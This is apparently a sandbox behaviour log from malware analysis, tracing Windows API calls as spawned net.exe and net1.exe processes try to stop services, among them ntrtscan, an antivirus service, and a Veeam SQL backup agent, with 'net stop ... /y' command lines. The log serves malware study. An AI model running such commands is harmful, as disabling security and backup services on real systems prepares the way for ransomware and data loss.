_wcsicmp (_String1="lanmanserver", _String2="SVCGENERICHOST") returned -7 [0208.320] _wcsicmp (_String1="alerter", _String2="SVCGENERICHOST") returned -18 [0208.320] _wcsicmp (_String1="netlogon", _String2="SVCGENERICHOST") returned -5 [0208.320] NetServiceControl (in: servername=0x0, service="SVCGENERICHOST", opcode=0x0, arg=0x0, bufptr=0x1dfc24 | out: bufptr=0x1dfc24) returned 0x889 [0208.322] wcscpy_s (in: _Destination=0x48a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0208.322] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0208.323] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x48b338, nSize=0x800, Arguments=0x489dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0208.324] GetFileType (hFile=0x26c) returned 0x3 [0208.324] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5b4008 [0208.324] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5b4008, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0208.324] WriteFile (in: hFile=0x26c, lpBuffer=0x5b4008, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1dfb64, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfb64, lpOverlapped=0x0) returned 0 [0208.324] LocalFree (hMem=0x5b4008) returned 0x0 [0208.324] GetFileType (hFile=0x26c) returned 0x3 [0208.324] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5b62b0 [0208.324] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5b62b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n[", lpUsedDefaultChar=0x0) returned 2 [0208.324] WriteFile (in: hFile=0x26c, lpBuffer=0x5b62b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1dfb64, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfb64, lpOverlapped=0x0) returned 0 [0208.324] LocalFree (hMem=0x5b62b0) returned 0x0 [0208.324] _ultow (in: _Dest=0x889, _Radix=1964948 | out: _Dest=0x889) returned="2185" [0208.325] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x48b338, nSize=0x800, Arguments=0x489dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0208.325] GetFileType (hFile=0x26c) returned 0x3 [0208.325] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5b62b0 [0208.325] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5b62b0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0208.325] WriteFile (in: hFile=0x26c, lpBuffer=0x5b62b0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1dfb70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfb70, lpOverlapped=0x0) returned 0 [0208.325] LocalFree (hMem=0x5b62b0) returned 0x0 [0208.325] GetFileType (hFile=0x26c) returned 0x3 [0208.325] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5b62b0 [0208.325] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5b62b0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n[", lpUsedDefaultChar=0x0) returned 2 [0208.325] WriteFile (in: hFile=0x26c, lpBuffer=0x5b62b0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1dfb70, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1dfb70, lpOverlapped=0x0) returned 0 [0208.325] LocalFree (hMem=0x5b62b0) returned 0x0 [0208.326] NetApiBufferFree (Buffer=0x5b1c78) returned 0x0 [0208.326] NetApiBufferFree (Buffer=0x5b1c90) returned 0x0 [0208.326] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop svcGenericHost /y" [0208.326] exit (_Code=2) Process: id = "260" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1fc4e000" os_pid = "0x9ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ntrtscan /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 433 os_tid = 0xa00 Process: id = "261" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x1986b000" os_pid = "0x8a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "260" os_parent_pid = "0x9ec" cmd_line = "C:\\Windows\\system32\\net1 stop ntrtscan /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 434 os_tid = 0x9fc [0208.463] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2dfdcc | out: lpSystemTimeAsFileTime=0x2dfdcc*(dwLowDateTime=0x4570aee0, dwHighDateTime=0x1d57a87)) [0208.463] GetCurrentProcessId () returned 0x8a4 [0208.463] GetCurrentThreadId () returned 0x9fc [0208.463] GetTickCount () returned 0x116db62 [0208.463] QueryPerformanceCounter (in: lpPerformanceCount=0x2dfdc4 | out: lpPerformanceCount=0x2dfdc4*=32874756888) returned 1 [0208.463] GetModuleHandleA (lpModuleName=0x0) returned 0x1f0000 [0208.463] __set_app_type (_Type=0x1) [0208.463] __p__fmode () returned 0x74eb31f4 [0208.463] __p__commode () returned 0x74eb31fc [0208.463] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1fffe6) returned 0x0 [0208.464] __getmainargs (in: _Argc=0x209064, _Argv=0x20906c, _Env=0x209068, _DoWildCard=0, _StartInfo=0x209024 | out: _Argc=0x209064, _Argv=0x20906c, _Env=0x209068) returned 0 [0208.464] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.464] GetConsoleOutputCP () returned 0x1b5 [0208.464] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x209080 | out: lpCPInfo=0x209080) returned 1 [0208.464] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.467] sprintf_s (in: _DstBuf=0x2dfd84, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0208.467] setlocale (category=0, locale=".437") returned="English_United States.437" [0208.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0208.469] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0208.469] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ntrtscan /y" [0208.469] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2dfb50, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0208.469] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x64) returned 0x2f3c00 [0208.470] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0208.470] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2dfd54 | out: Buffer=0x2dfd54*=0x2f1c60) returned 0x0 [0208.470] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2dfd54 | out: Buffer=0x2dfd54*=0x2f1c78) returned 0x0 [0208.470] _fileno (_File=0x74eb2900) returned -2 [0208.470] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0208.470] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0208.470] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0208.470] _wcsicmp (_String1="config", _String2="stop") returned -16 [0208.470] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0208.470] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0208.470] _wcsicmp (_String1="file", _String2="stop") returned -13 [0208.470] _wcsicmp (_String1="files", _String2="stop") returned -13 [0208.470] _wcsicmp (_String1="group", _String2="stop") returned -12 [0208.470] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0208.470] _wcsicmp (_String1="help", _String2="stop") returned -11 [0208.470] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0208.470] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0208.470] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0208.470] _wcsicmp (_String1="session", _String2="stop") returned -15 [0208.470] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0208.470] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0208.470] _wcsicmp (_String1="share", _String2="stop") returned -12 [0208.470] _wcsicmp (_String1="start", _String2="stop") returned -14 [0208.471] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0208.471] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0208.471] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0208.471] _wcsicmp (_String1="accounts", _String2="ntrtscan") returned -13 [0208.471] _wcsicmp (_String1="computer", _String2="ntrtscan") returned -11 [0208.471] _wcsicmp (_String1="config", _String2="ntrtscan") returned -11 [0208.471] _wcsicmp (_String1="continue", _String2="ntrtscan") returned -11 [0208.471] _wcsicmp (_String1="cont", _String2="ntrtscan") returned -11 [0208.471] _wcsicmp (_String1="file", _String2="ntrtscan") returned -8 [0208.471] _wcsicmp (_String1="files", _String2="ntrtscan") returned -8 [0208.471] _wcsicmp (_String1="group", _String2="ntrtscan") returned -7 [0208.471] _wcsicmp (_String1="groups", _String2="ntrtscan") returned -7 [0208.471] _wcsicmp (_String1="help", _String2="ntrtscan") returned -6 [0208.471] _wcsicmp (_String1="helpmsg", _String2="ntrtscan") returned -6 [0208.471] _wcsicmp (_String1="localgroup", _String2="ntrtscan") returned -2 [0208.471] _wcsicmp (_String1="pause", _String2="ntrtscan") returned 2 [0208.471] _wcsicmp (_String1="session", _String2="ntrtscan") returned 5 [0208.471] _wcsicmp (_String1="sessions", _String2="ntrtscan") returned 5 [0208.471] _wcsicmp (_String1="sess", _String2="ntrtscan") returned 5 [0208.471] _wcsicmp (_String1="share", _String2="ntrtscan") returned 5 [0208.471] _wcsicmp (_String1="start", _String2="ntrtscan") returned 5 [0208.471] _wcsicmp (_String1="stats", _String2="ntrtscan") returned 5 [0208.471] _wcsicmp (_String1="statistics", _String2="ntrtscan") returned 5 [0208.471] _wcsicmp (_String1="stop", _String2="ntrtscan") returned 5 [0208.471] _wcsicmp (_String1="time", _String2="ntrtscan") returned 6 [0208.471] _wcsicmp (_String1="user", _String2="ntrtscan") returned 7 [0208.471] _wcsicmp (_String1="users", _String2="ntrtscan") returned 7 [0208.471] _wcsicmp (_String1="msg", _String2="ntrtscan") returned -1 [0208.471] _wcsicmp (_String1="messenger", _String2="ntrtscan") returned -1 [0208.471] _wcsicmp (_String1="receiver", _String2="ntrtscan") returned 4 [0208.471] _wcsicmp (_String1="rcv", _String2="ntrtscan") returned 4 [0208.471] _wcsicmp (_String1="netpopup", _String2="ntrtscan") returned -15 [0208.471] _wcsicmp (_String1="redirector", _String2="ntrtscan") returned 4 [0208.471] _wcsicmp (_String1="redir", _String2="ntrtscan") returned 4 [0208.471] _wcsicmp (_String1="rdr", _String2="ntrtscan") returned 4 [0208.471] _wcsicmp (_String1="workstation", _String2="ntrtscan") returned 9 [0208.471] _wcsicmp (_String1="work", _String2="ntrtscan") returned 9 [0208.472] _wcsicmp (_String1="wksta", _String2="ntrtscan") returned 9 [0208.472] _wcsicmp (_String1="prdr", _String2="ntrtscan") returned 2 [0208.472] _wcsicmp (_String1="devrdr", _String2="ntrtscan") returned -10 [0208.472] _wcsicmp (_String1="lanmanworkstation", _String2="ntrtscan") returned -2 [0208.472] _wcsicmp (_String1="server", _String2="ntrtscan") returned 5 [0208.472] _wcsicmp (_String1="svr", _String2="ntrtscan") returned 5 [0208.472] _wcsicmp (_String1="srv", _String2="ntrtscan") returned 5 [0208.472] _wcsicmp (_String1="lanmanserver", _String2="ntrtscan") returned -2 [0208.472] _wcsicmp (_String1="alerter", _String2="ntrtscan") returned -13 [0208.472] _wcsicmp (_String1="netlogon", _String2="ntrtscan") returned -15 [0208.472] _wcsupr (in: _String="ntrtscan" | out: _String="NTRTSCAN") returned="NTRTSCAN" [0208.472] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2f54b8 [0208.475] GetServiceKeyNameW (in: hSCManager=0x2f54b8, lpDisplayName="NTRTSCAN", lpServiceName=0x20aaf0, lpcchBuffer=0x2dfcf0 | out: lpServiceName="", lpcchBuffer=0x2dfcf0) returned 0 [0208.475] _wcsicmp (_String1="msg", _String2="NTRTSCAN") returned -1 [0208.475] _wcsicmp (_String1="messenger", _String2="NTRTSCAN") returned -1 [0208.475] _wcsicmp (_String1="receiver", _String2="NTRTSCAN") returned 4 [0208.475] _wcsicmp (_String1="rcv", _String2="NTRTSCAN") returned 4 [0208.475] _wcsicmp (_String1="redirector", _String2="NTRTSCAN") returned 4 [0208.475] _wcsicmp (_String1="redir", _String2="NTRTSCAN") returned 4 [0208.475] _wcsicmp (_String1="rdr", _String2="NTRTSCAN") returned 4 [0208.475] _wcsicmp (_String1="workstation", _String2="NTRTSCAN") returned 9 [0208.475] _wcsicmp (_String1="work", _String2="NTRTSCAN") returned 9 [0208.475] _wcsicmp (_String1="wksta", _String2="NTRTSCAN") returned 9 [0208.475] _wcsicmp (_String1="prdr", _String2="NTRTSCAN") returned 2 [0208.475] _wcsicmp (_String1="devrdr", _String2="NTRTSCAN") returned -10 [0208.475] _wcsicmp (_String1="lanmanworkstation", _String2="NTRTSCAN") returned -2 [0208.475] _wcsicmp (_String1="server", _String2="NTRTSCAN") returned 5 [0208.475] _wcsicmp (_String1="svr", _String2="NTRTSCAN") returned 5 [0208.476] _wcsicmp (_String1="srv", _String2="NTRTSCAN") returned 5 [0208.476] _wcsicmp (_String1="lanmanserver", _String2="NTRTSCAN") returned -2 [0208.476] _wcsicmp (_String1="alerter", _String2="NTRTSCAN") returned -13 [0208.476] _wcsicmp (_String1="netlogon", _String2="NTRTSCAN") returned -15 [0208.476] NetServiceControl (in: servername=0x0, service="NTRTSCAN", opcode=0x0, arg=0x0, bufptr=0x2dfcec | out: bufptr=0x2dfcec) returned 0x889 [0208.477] wcscpy_s (in: _Destination=0x20a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0208.477] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0208.477] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x20b338, nSize=0x800, Arguments=0x209dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0208.478] GetFileType (hFile=0x26c) returned 0x3 [0208.478] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2f3fe8 [0208.478] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2f3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0208.478] WriteFile (in: hFile=0x26c, lpBuffer=0x2f3fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2dfc2c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfc2c, lpOverlapped=0x0) returned 0 [0208.478] LocalFree (hMem=0x2f3fe8) returned 0x0 [0208.479] GetFileType (hFile=0x26c) returned 0x3 [0208.479] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2f6290 [0208.479] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2f6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n/", lpUsedDefaultChar=0x0) returned 2 [0208.479] WriteFile (in: hFile=0x26c, lpBuffer=0x2f6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2dfc2c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfc2c, lpOverlapped=0x0) returned 0 [0208.479] LocalFree (hMem=0x2f6290) returned 0x0 [0208.479] _ultow (in: _Dest=0x889, _Radix=3013724 | out: _Dest=0x889) returned="2185" [0208.479] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x20b338, nSize=0x800, Arguments=0x209dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0208.479] GetFileType (hFile=0x26c) returned 0x3 [0208.479] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2f6290 [0208.479] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2f6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0208.479] WriteFile (in: hFile=0x26c, lpBuffer=0x2f6290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2dfc38, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfc38, lpOverlapped=0x0) returned 0 [0208.479] LocalFree (hMem=0x2f6290) returned 0x0 [0208.479] GetFileType (hFile=0x26c) returned 0x3 [0208.479] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2f6290 [0208.479] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2f6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n/", lpUsedDefaultChar=0x0) returned 2 [0208.479] WriteFile (in: hFile=0x26c, lpBuffer=0x2f6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2dfc38, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2dfc38, lpOverlapped=0x0) returned 0 [0208.479] LocalFree (hMem=0x2f6290) returned 0x0 [0208.480] NetApiBufferFree (Buffer=0x2f1c60) returned 0x0 [0208.480] NetApiBufferFree (Buffer=0x2f1c78) returned 0x0 [0208.480] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ntrtscan /y" [0208.480] exit (_Code=2) Process: id = "262" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6a053000" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 435 os_tid = 0x8d0 Process: id = "263" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x499eb000" os_pid = "0x8cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "262" os_parent_pid = "0xa14" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2012 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 436 os_tid = 0xa50 [0208.609] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27fe60 | out: lpSystemTimeAsFileTime=0x27fe60*(dwLowDateTime=0x45887ca0, dwHighDateTime=0x1d57a87)) [0208.609] GetCurrentProcessId () returned 0x8cc [0208.609] GetCurrentThreadId () returned 0xa50 [0208.609] GetTickCount () returned 0x116dbfe [0208.609] QueryPerformanceCounter (in: lpPerformanceCount=0x27fe58 | out: lpPerformanceCount=0x27fe58*=32889401192) returned 1 [0208.610] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0208.610] __set_app_type (_Type=0x1) [0208.610] __p__fmode () returned 0x74eb31f4 [0208.610] __p__commode () returned 0x74eb31fc [0208.610] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe8ffe6) returned 0x0 [0208.610] __getmainargs (in: _Argc=0xe99064, _Argv=0xe9906c, _Env=0xe99068, _DoWildCard=0, _StartInfo=0xe99024 | out: _Argc=0xe99064, _Argv=0xe9906c, _Env=0xe99068) returned 0 [0208.610] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.610] GetConsoleOutputCP () returned 0x1b5 [0208.610] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe99080 | out: lpCPInfo=0xe99080) returned 1 [0208.610] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.613] sprintf_s (in: _DstBuf=0x27fe18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0208.613] setlocale (category=0, locale=".437") returned="English_United States.437" [0208.615] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0208.615] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0208.615] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2012 /y" [0208.615] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27fbe4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0208.616] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x7e) returned 0x5d3c20 [0208.616] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0208.616] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27fde8 | out: Buffer=0x27fde8*=0x5d1c80) returned 0x0 [0208.616] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x27fde8 | out: Buffer=0x27fde8*=0x5d1c98) returned 0x0 [0208.616] _fileno (_File=0x74eb2900) returned -2 [0208.616] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0208.616] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0208.616] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0208.616] _wcsicmp (_String1="config", _String2="stop") returned -16 [0208.616] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0208.616] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0208.616] _wcsicmp (_String1="file", _String2="stop") returned -13 [0208.616] _wcsicmp (_String1="files", _String2="stop") returned -13 [0208.616] _wcsicmp (_String1="group", _String2="stop") returned -12 [0208.616] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0208.616] _wcsicmp (_String1="help", _String2="stop") returned -11 [0208.616] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0208.616] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0208.616] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0208.617] _wcsicmp (_String1="session", _String2="stop") returned -15 [0208.617] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0208.617] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0208.617] _wcsicmp (_String1="share", _String2="stop") returned -12 [0208.617] _wcsicmp (_String1="start", _String2="stop") returned -14 [0208.617] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0208.617] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0208.617] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0208.617] _wcsicmp (_String1="accounts", _String2="SQLAgent$VEEAMSQL2012") returned -18 [0208.617] _wcsicmp (_String1="computer", _String2="SQLAgent$VEEAMSQL2012") returned -16 [0208.617] _wcsicmp (_String1="config", _String2="SQLAgent$VEEAMSQL2012") returned -16 [0208.617] _wcsicmp (_String1="continue", _String2="SQLAgent$VEEAMSQL2012") returned -16 [0208.617] _wcsicmp (_String1="cont", _String2="SQLAgent$VEEAMSQL2012") returned -16 [0208.617] _wcsicmp (_String1="file", _String2="SQLAgent$VEEAMSQL2012") returned -13 [0208.617] _wcsicmp (_String1="files", _String2="SQLAgent$VEEAMSQL2012") returned -13 [0208.617] _wcsicmp (_String1="group", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0208.617] _wcsicmp (_String1="groups", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0208.617] _wcsicmp (_String1="help", _String2="SQLAgent$VEEAMSQL2012") returned -11 [0208.617] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$VEEAMSQL2012") returned -11 [0208.617] _wcsicmp (_String1="localgroup", _String2="SQLAgent$VEEAMSQL2012") returned -7 [0208.617] _wcsicmp (_String1="pause", _String2="SQLAgent$VEEAMSQL2012") returned -3 [0208.617] _wcsicmp (_String1="session", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0208.617] _wcsicmp (_String1="sessions", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0208.617] _wcsicmp (_String1="sess", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0208.617] _wcsicmp (_String1="share", _String2="SQLAgent$VEEAMSQL2012") returned -9 [0208.617] _wcsicmp (_String1="start", _String2="SQLAgent$VEEAMSQL2012") returned 3 [0208.617] _wcsicmp (_String1="stats", _String2="SQLAgent$VEEAMSQL2012") returned 3 [0208.617] _wcsicmp (_String1="statistics", _String2="SQLAgent$VEEAMSQL2012") returned 3 [0208.617] _wcsicmp (_String1="stop", _String2="SQLAgent$VEEAMSQL2012") returned 3 [0208.617] _wcsicmp (_String1="time", _String2="SQLAgent$VEEAMSQL2012") returned 1 [0208.617] _wcsicmp (_String1="user", _String2="SQLAgent$VEEAMSQL2012") returned 2 [0208.617] _wcsicmp (_String1="users", _String2="SQLAgent$VEEAMSQL2012") returned 2 [0208.617] _wcsicmp (_String1="msg", _String2="SQLAgent$VEEAMSQL2012") returned -6 [0208.617] _wcsicmp (_String1="messenger", _String2="SQLAgent$VEEAMSQL2012") returned -6 [0208.617] _wcsicmp (_String1="receiver", _String2="SQLAgent$VEEAMSQL2012") returned -1 [0208.617] _wcsicmp (_String1="rcv", _String2="SQLAgent$VEEAMSQL2012") returned -1 [0208.617] _wcsicmp (_String1="netpopup", _String2="SQLAgent$VEEAMSQL2012") returned -5 [0208.617] _wcsicmp (_String1="redirector", _String2="SQLAgent$VEEAMSQL2012") returned -1 [0208.618] _wcsicmp (_String1="redir", _String2="SQLAgent$VEEAMSQL2012") returned -1 [0208.618] _wcsicmp (_String1="rdr", _String2="SQLAgent$VEEAMSQL2012") returned -1 [0208.618] _wcsicmp (_String1="workstation", _String2="SQLAgent$VEEAMSQL2012") returned 4 [0208.618] _wcsicmp 